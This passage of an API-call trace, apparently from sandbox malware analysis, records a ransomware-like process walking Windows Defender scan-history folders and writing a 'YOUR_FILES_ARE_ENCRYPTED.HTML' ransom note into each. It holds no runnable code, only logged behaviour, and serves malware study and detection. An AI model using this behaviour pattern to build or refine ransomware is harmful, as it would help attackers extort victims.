lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.530] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="324", cAlternateFileName="")) returned 1 [0107.530] StrStrIW (lpFirst="324", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.530] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\324") returned 83 [0107.530] PathFindExtensionW (pszPath="324") returned="" [0107.530] lstrlenW (lpString="") returned 0 [0107.530] PathFindExtensionW (pszPath="324") returned="" [0107.530] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="324", cAlternateFileName="")) returned 0 [0107.530] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.532] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.532] GetProcessHeap () returned 0x600000 [0107.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\03\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.533] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.534] CloseHandle (hObject=0x308) returned 1 [0107.534] GetProcessHeap () returned 0x600000 [0107.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.534] GetProcessHeap () returned 0x600000 [0107.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.535] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="04", cAlternateFileName="")) returned 1 [0107.535] StrStrIW (lpFirst="04", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.535] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04") returned 79 [0107.535] GetProcessHeap () returned 0x600000 [0107.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.536] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04" [0107.537] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*" [0107.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.537] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.537] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109005", cAlternateFileName="")) returned 1 [0107.537] StrStrIW (lpFirst="109005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.537] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\109005") returned 86 [0107.537] PathFindExtensionW (pszPath="109005") returned="" [0107.537] lstrlenW (lpString="") returned 0 [0107.537] PathFindExtensionW (pszPath="109005") returned="" [0107.537] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="259", cAlternateFileName="")) returned 1 [0107.537] StrStrIW (lpFirst="259", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.537] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\259") returned 83 [0107.538] PathFindExtensionW (pszPath="259") returned="" [0107.538] lstrlenW (lpString="") returned 0 [0107.538] PathFindExtensionW (pszPath="259") returned="" [0107.538] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="261", cAlternateFileName="")) returned 1 [0107.538] StrStrIW (lpFirst="261", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.538] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\261") returned 83 [0107.538] PathFindExtensionW (pszPath="261") returned="" [0107.538] lstrlenW (lpString="") returned 0 [0107.538] PathFindExtensionW (pszPath="261") returned="" [0107.538] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="261", cAlternateFileName="")) returned 0 [0107.538] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.538] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.538] GetProcessHeap () returned 0x600000 [0107.538] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\04\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.539] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.540] CloseHandle (hObject=0x308) returned 1 [0107.540] GetProcessHeap () returned 0x600000 [0107.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.540] GetProcessHeap () returned 0x600000 [0107.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.541] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="05", cAlternateFileName="")) returned 1 [0107.541] StrStrIW (lpFirst="05", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.541] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05") returned 79 [0107.541] GetProcessHeap () returned 0x600000 [0107.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.542] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05" [0107.542] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*" [0107.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0107.543] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.543] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="191", cAlternateFileName="")) returned 1 [0107.543] StrStrIW (lpFirst="191", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\191") returned 83 [0107.543] PathFindExtensionW (pszPath="191") returned="" [0107.543] lstrlenW (lpString="") returned 0 [0107.543] PathFindExtensionW (pszPath="191") returned="" [0107.543] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="199", cAlternateFileName="")) returned 1 [0107.543] StrStrIW (lpFirst="199", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\199") returned 83 [0107.543] PathFindExtensionW (pszPath="199") returned="" [0107.543] lstrlenW (lpString="") returned 0 [0107.543] PathFindExtensionW (pszPath="199") returned="" [0107.543] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="317", cAlternateFileName="")) returned 1 [0107.543] StrStrIW (lpFirst="317", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\317") returned 83 [0107.543] PathFindExtensionW (pszPath="317") returned="" [0107.544] lstrlenW (lpString="") returned 0 [0107.544] PathFindExtensionW (pszPath="317") returned="" [0107.544] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="317", cAlternateFileName="")) returned 0 [0107.544] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0107.544] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.544] GetProcessHeap () returned 0x600000 [0107.544] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\05\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.544] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.545] CloseHandle (hObject=0x308) returned 1 [0107.546] GetProcessHeap () returned 0x600000 [0107.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.546] GetProcessHeap () returned 0x600000 [0107.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.547] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="07", cAlternateFileName="")) returned 1 [0107.547] StrStrIW (lpFirst="07", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.547] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07") returned 79 [0107.547] GetProcessHeap () returned 0x600000 [0107.547] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.548] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07" [0107.548] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*" [0107.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.548] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.549] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="273", cAlternateFileName="")) returned 1 [0107.549] StrStrIW (lpFirst="273", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.549] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\273") returned 83 [0107.549] PathFindExtensionW (pszPath="273") returned="" [0107.549] lstrlenW (lpString="") returned 0 [0107.549] PathFindExtensionW (pszPath="273") returned="" [0107.549] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="273", cAlternateFileName="")) returned 0 [0107.549] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.549] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.549] GetProcessHeap () returned 0x600000 [0107.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.549] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\07\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\07\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.550] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.550] CloseHandle (hObject=0x308) returned 1 [0107.551] GetProcessHeap () returned 0x600000 [0107.551] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.551] GetProcessHeap () returned 0x600000 [0107.551] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.552] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="09", cAlternateFileName="")) returned 1 [0107.552] StrStrIW (lpFirst="09", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.552] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 